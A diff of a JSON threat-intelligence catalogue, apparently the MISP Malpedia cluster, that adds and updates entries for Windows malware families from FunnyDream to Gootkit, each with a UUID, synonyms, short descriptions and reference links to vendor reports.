"FunnySwitch" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" + ], + "synonyms": [], + "type": [] + }, + "uuid": "46417b64-928a-43cd-91a6-ecee4c6cd4a7", + "value": "FunnyDream" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", - "https://sentinelone.com/blogs/sfg-furtims-parent/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f" + "https://sentinelone.com/blogs/sfg-furtims-parent/" ], "synonyms": [], "type": [] @@ -8421,6 +15943,33 @@ "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", "value": "Furtim" }, + { + "description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy", + "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html", + "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "289b4ffd-d406-44b1-99d4-3406dfd24adb", + "value": "FuxSocy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux", + "https://krabsonsecurity.com/2020/10/24/gacrux-a-basic-c-malware-with-a-custom-pe-loader/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "551140ca-001b-49d8-aa06-82a5aebb02dd", + "value": "Gacrux" + }, { "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { @@ -8465,14 +16014,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", - "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", - "https://www.wired.com/?p=2171700", + "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf", + "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf" + "https://www.wired.com/?p=2171700", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.lawfareblog.com/what-point-these-nation-state-indictments" ], "synonyms": [ "GOZ", + "Mapp", "ZeuS P2P" ], "type": [] @@ -8493,25 +16048,52 @@ "value": "Gamotrol" }, { - "description": "", + "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", + "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom", + "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", + "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", - "http://asec.ahnlab.com/1145", - "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", - "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", - "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-garden", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", - "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "http://asec.ahnlab.com/1145", + "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://vimeo.com/449849549", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", + "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [ "GrandCrab" @@ -8552,10 +16134,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", - "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", "https://securelist.com/introducing-whitebear/81638/", "https://www.youtube.com/watch?v=Pvzhtjl86wc", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/", "https://github.com/eset/malware-ioc/tree/master/turla", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ @@ -8584,7 +16168,6 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", - "https://www.rekings.com/ispy-customers/", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" ], "synonyms": [], @@ -8593,6 +16176,19 @@ "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", "value": "GearInformer" }, + { + "description": "According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "06d80b50-703a-4cf9-989e-b8b1bf71144a", + "value": "GEARSHIFT" + }, { "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.", "meta": { @@ -8606,6 +16202,42 @@ "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", "value": "GEMCUTTER" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/", + "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://www.goggleheadedhacker.com/blog/post/13", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" + ], + "synonyms": [ + "FRIENDSPEAK", + "GetandGo" + ], + "type": [] + }, + "uuid": "f6aa0163-bde3-44a2-8acc-3e7a04cf167d", + "value": "Get2" + }, { "description": "", "meta": { @@ -8637,6 +16269,19 @@ "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", "value": "GetMyPass" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd", + "https://ihonker.org/thread-1504-1-1.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a762023d-8d46-43a8-be01-3b2362963de0", + "value": "get_pwd" + }, { "description": "", "meta": { @@ -8692,17 +16337,45 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", + "https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", "http://www.hexblog.com/?p=1248", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://www.intezer.com/blog-chinaz-relations/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", + "http://www.nartv.org/mirror/ghostnet.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://blog.cylance.com/the-ghost-dragon", - "https://www.intezer.com/blog-chinaz-relations/" + "https://s.tencent.com/research/report/836.html", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", + "https://blog.talosintelligence.com/2019/09/panda-evolution.html", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-globe", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://www.datanet.co.kr/news/articleView.html?idxno=133346", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "http://www.malware-traffic-analysis.net/2018/01/04/index.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://risky.biz/whatiswinnti/", + "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", + "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", + "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/" ], "synonyms": [ + "Farfli", "Gh0st RAT", "PCRat" ], @@ -8715,8 +16388,46 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", - "https://forum.exploit.in/pda/index.php/t102378.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish", + "https://id-ransomware.blogspot.com/2020/02/gibberish-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f561656c-19d1-4b07-a193-3293d053e774", + "value": "Gibberish Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy", + "https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d", + "value": "Giffy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ginwui", + "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7f768705-d852-4c66-a7e0-76fd5016d07f", + "value": "Ginwui" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses" ], "synonyms": [ "Wordpress Bruteforcer" @@ -8758,9 +16469,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://isc.sans.edu/diary/23417", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" ], @@ -8800,10 +16518,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", "http://resources.infosecinstitute.com/tdss4-part-1/", - "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", + "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", + "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" ], "synonyms": [], @@ -8812,12 +16536,71 @@ "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", "value": "Glupteba" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr", + "https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "56060ca3-ee34-4df9-bcaa-70267d8440c1", + "value": "GoBotKR" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker", + "https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html", + "https://twitter.com/GrujaRS/status/1254657823478353920", + "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f93da83e-0c2f-4dc0-82c6-2fcc6339dcf2", + "value": "goCryptoLocker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12", + "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" + ], + "synonyms": [ + "GOSLU" + ], + "type": [] + }, + "uuid": "f62ad36f-e274-4fdb-b71d-887f9cd9c215", + "value": "Godlike12" + }, + { + "description": "Proof of concept for data exfiltration via DoH, written in Go.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh", + "https://sensepost.com/blog/2018/waiting-for-godoh/", + "https://github.com/sensepost/goDoH" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b54b4238-550f-42a7-9e62-d1ad5e4d3904", + "value": "goDoH" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" + "https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/" ], "synonyms": [], "type": [] @@ -8838,14 +16621,28 @@ "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", "value": "Goggles" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle", + "https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/" + ], + "synonyms": [ + "BossiTossi" + ], + "type": [] + }, + "uuid": "034a3db0-b53c-4ec1-9390-4b6f214e1233", + "value": "GoGoogle" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", - "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html" + "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/" ], "synonyms": [ "Petya/Mischa" @@ -8857,10 +16654,60 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1dd854b4-d8e6-438c-a0b1-6991b8b6ff92", + "value": "GoldenHelper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/", + "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf", + "https://www.ic3.gov/media/news/2020/200728.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/", + "https://www.ic3.gov/Media/News/2020/201103-1.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "86b8bd8d-19c5-4c7a-befd-0eb6297776bc", + "value": "GoldenSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax", + "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" + ], + "synonyms": [ + "SUNSHUTTLE" + ], + "type": [] + }, + "uuid": "9a3429d7-e4a8-43c5-8786-0b3a1c841a5f", + "value": "GoldMax" + }, + { + "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" ], "synonyms": [], "type": [] @@ -8881,11 +16728,26 @@ "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", "value": "Golroted" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer", + "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ea9a9585-2a99-42b9-a724-bf7af82bb986", + "value": "Gomorrah stealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ @@ -8927,24 +16789,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", - "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", - "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", - "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://dannyquist.github.io/gootkit-reversing-ghidra/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", + "https://www.certego.net/en/news/malware-tales-gootkit/", + "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", + "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + 